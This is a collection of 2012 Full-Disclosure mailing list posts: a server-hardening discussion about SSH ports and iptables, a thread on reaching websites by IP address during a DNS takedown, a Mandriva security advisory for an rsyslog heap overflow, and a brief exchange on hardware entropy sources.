URL http://wdc.com/en/products/products.aspx?id=570.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] server security

[Daniel Hadfield]

It depends what the attackers motive is. Is he/she trying to get as many
machines infected as he/she can. Or is he/she trying to get into YOUR
network.

My 2c

On 21/06/2012 20:20, Thor (Hammer of God) wrote:
> I completely agree with Gage.  The way I see it, security through obscurity 
> is perfectly valid as long as the control remains obscured.  I think the 
> "anyone can just scan your ports" is somewhat specious in that most (if not 
> something like 99% or so (unqualified opinion of course)) traffic is simply 
> noise and scans for standard ports.  This is particularly true when it 
> matters most: during a worm outbreak or a newly published vulnerability.  
> Attackers simply don't have the time nor the inclination to go through and 
> perform slow and loud scans when they can quickly move on to the next target. 
>  If 90% of the targets have services on the default ports, then it makes far 
> more sense to just go after the easily targets.  
>
> Perfect case-in-point is the recent RDP unpleasantness.   Non-standard port 
> deployments were automatically removed from the target scans for 3389.  I 
> don't see how any can argue against the security value of such a 
> configuration.
>
> t  
>
>
>
> Timothy "Thor"  Mullen
> www.hammerofgod.com
> Thor's Microsoft Security Bible
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
> Sent: Thursday, June 21, 2012 9:25 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] server security
>
> Well thats a bit of an iffy one. I'd say it IS a security measure, albeit one 
> that is solely effective if and only if compounded with other measures.
>
> It's unlikely, but you never know, you just might miss out on a nasty worm 
> all because you werent running on a  default port one day.
>
> On Thu, Jun 21, 2012 at 8:52 AM, Rob  wrote:
>> We need to make a distinction between security and obscurity here. The only 
>> time changing ports actually hardens a service in any way is when the port 
>> requires elevated rights to bind, changing to 1025 for example removes the 
>> root requirement. Any actual or theoretical vulnerabilities still exist. If 
>> somebody is looking at your server, they'll find the port without much 
>> trouble. Alternate ports can remove junk traffic from logs, so there is a 
>> benefit, if not entirely a security one.
>>
>> Rob
>>
>>
>> Sent on the Sprint® Now Network from my BlackBerry®
>>
>> -Original Message-
>> From: Alex Dolan 
>> Sender: listbou...@securityfocus.com
>> Date: Thu, 21 Jun 2012 07:44:57
>> To: Littlefield, Tyler
>> Cc: 
>> Subject: Re: server security
>>
>> One tip I have is to set SSH to a port other than 22, I don't need to 
>> tell anyone how devastating it is if someone did actually get access 
>> to that service. Putting it on some other port reduces your risk
>>
>> On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler  
>> wrote:
>>> Hello:
>>> I have a couple questions. First, I'll explain what I did:
>>> I set up iptables and removed all unwanted services. Iptables blocks 
>>> everything, then only opens what it wants. I also use the addrtype 
>>> module to limit broadcast and unspec addresses, etc. I also do some 
>>> malformed packet work where I just drop everything that looks 
>>> malformed (mainly by the flags).
>>> 2) I secured ssh: blocked root logins, set it up so only users in the 
>>> sshusers group can connect, and set it only to allow ppk.
>>> 3) I installed aid.
>>> 4) disabled malformed packets and forwarding/etc in sysctl.
>>> This is a basic web server that runs email, web and a couple other things.
>>> It's only running on a linode512, so I don't have the ability to set 
>>> up a ton of stuff; I also think that would make things more of a 
>>> mess. What else would be recommended?
>>> Also, I'm looking to add something to the web server; sometimes I 
>>> notice that there are a lot of requests from people scanning for 
>>> common urls like wordpress/phpbb3/etc, what kind of preventative measures 
>>> exist for this?
>>>
>>>
>>> --
>>> Take care,
>>> Ty
>>> http://tds-solutions.net
>>> The aspen project: a barebones light-weight mud engine:
>>> http://code.google.com/p/aspenmud
>>> He that will not reason is a bigot; he that cannot reason is a fool; 
>>> he that dares not reason is a slave.
>>>
>>>
>>> -
>>> --- Securing Apache Web Server with thawte Digital Certificate In 
>>> this guide we examine the importance of Apache-SSL and who needs an 
>>> SSL certificate.  We look at how SSL works, how it benefits your 
>>> company and how your customers can tell if a site is secure. You will 
>>> find out how to test, purchase, install and use a thawte Digital 
>>> Certificate on your Apache web server. Throughout, best practices for 
>>> set-up are highlighted to help you ensure efficient ongoing 
>>

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

[alan buxey]

Hi,

> But after reading this article you will know how easily you can access your 
> websites. You can access them by typing their IP address in your web-browser.
> 
> Copy the IP addresses given below:
> 
> tumblr.com 174.121.194.34
> wikipedia.org 208.80.152.201

partially true and not always the case. the servers may be co-hosted and if 
reached via IP address you wouldnt
be handled by the virtual hosting redirection and therefore drop onto some 
other site/service/catch-all... same is true if
you use alternatives to the old IPv4 - for example, I prefer to access 
www.wikipedia.org via 2620:0:862:ed1a::1


alan

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

[Jardel]

Do you know? Even in DNS take down you can youcan access your favourite sites. 

People may think that in DNS shoutdown they can lost access to their addicted 
websites.


But after reading this article you will know how easily you can access your 
websites. You can access them by typing their IP address in your web-browser.

Copy the IP addresses given below:

tumblr.com 174.121.194.34
wikipedia.org 208.80.152.201

Original 
Article:http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2012:100 ] rsyslog

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:100
 http://www.mandriva.com/security/
 ___

 Package : rsyslog
 Date: June 25, 2012
 Affected: 2010.1
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in rsyslog:
 
 An integer signedness error, leading to heap based buffer overflow
 was found in the way the imfile module of rsyslog, an enhanced
 system logging and kernel message trapping daemon, processed text
 files larger than 64 KB. When the imfile rsyslog module was enabled,
 a local attacker could use this flaw to cause denial of service
 (rsyslogd daemon hang) via specially-crafted message, to be logged
 (CVE-2011-4623).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4623
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 380e112c14082d15cca5e1bb9919f582  
2010.1/i586/rsyslog-4.6.2-3.2mdv2010.2.i586.rpm
 0a485101e3f92899262a8d3082d3810f  
2010.1/i586/rsyslog-dbi-4.6.2-3.2mdv2010.2.i586.rpm
 5d48f21f67c1a84ef66e19288ae9567a  
2010.1/i586/rsyslog-docs-4.6.2-3.2mdv2010.2.i586.rpm
 80315f1b7f422b6b01fef01813e41821  
2010.1/i586/rsyslog-gssapi-4.6.2-3.2mdv2010.2.i586.rpm
 9a341e46b5f367c9b8b7dfdc7a989db4  
2010.1/i586/rsyslog-mysql-4.6.2-3.2mdv2010.2.i586.rpm
 6b6c0b4d0f5f2ebf2d376fa8c6c62049  
2010.1/i586/rsyslog-pgsql-4.6.2-3.2mdv2010.2.i586.rpm
 3e8209ad7b579dd01f0981e78df8f6f9  
2010.1/i586/rsyslog-relp-4.6.2-3.2mdv2010.2.i586.rpm
 2fe8bc6badc5dd5dfbe59b781abdd418  
2010.1/i586/rsyslog-snmp-4.6.2-3.2mdv2010.2.i586.rpm 
 9b56fe39f76363e49aef31175980402a  
2010.1/SRPMS/rsyslog-4.6.2-3.2mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 80aced08b93cf7362140d6ccec9f6ccc  
2010.1/x86_64/rsyslog-4.6.2-3.2mdv2010.2.x86_64.rpm
 b99fac44b5f5c7577046bed76902c286  
2010.1/x86_64/rsyslog-dbi-4.6.2-3.2mdv2010.2.x86_64.rpm
 b5020d7f1ab2c0af693d8d900fa89f5d  
2010.1/x86_64/rsyslog-docs-4.6.2-3.2mdv2010.2.x86_64.rpm
 362b0e0550acc8485426fb3786c8fe6e  
2010.1/x86_64/rsyslog-gssapi-4.6.2-3.2mdv2010.2.x86_64.rpm
 7ebd4c311d0321fa1890939b0de43c3a  
2010.1/x86_64/rsyslog-mysql-4.6.2-3.2mdv2010.2.x86_64.rpm
 be3a1b1029de820708559545d37424e7  
2010.1/x86_64/rsyslog-pgsql-4.6.2-3.2mdv2010.2.x86_64.rpm
 11d4ec93b3d8e3e445da2a07a95fd4fc  
2010.1/x86_64/rsyslog-relp-4.6.2-3.2mdv2010.2.x86_64.rpm
 8e5b6cedca81e23d5c7a0cc580f666b6  
2010.1/x86_64/rsyslog-snmp-4.6.2-3.2mdv2010.2.x86_64.rpm 
 9b56fe39f76363e49aef31175980402a  
2010.1/SRPMS/rsyslog-4.6.2-3.2mdv2010.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFP6DlLmqjQ0CJFipgRAiTLAJ4kgiHE0CUbzO1YRIP/18FMgLNh1wCdFmey
wvdYm6ytB01GvBxJN34aMQk=
=04hW
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [SECURITY] [DSA 2502-1] python-crypto security update

[BMF]

On Sun, Jun 24, 2012 at 7:35 PM, coderman  wrote:
> how many of you fools mix a hw entropy source into your crypto keying?
>
> ever hear of 82802? XSTORE? RDRAND? lava lamps?

I have a server with one of these in it:

http://www.entropykey.co.uk/

although I still need to find a reasonably secure way to share the
entropy with all of my VMs where it is really needed.

BMF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/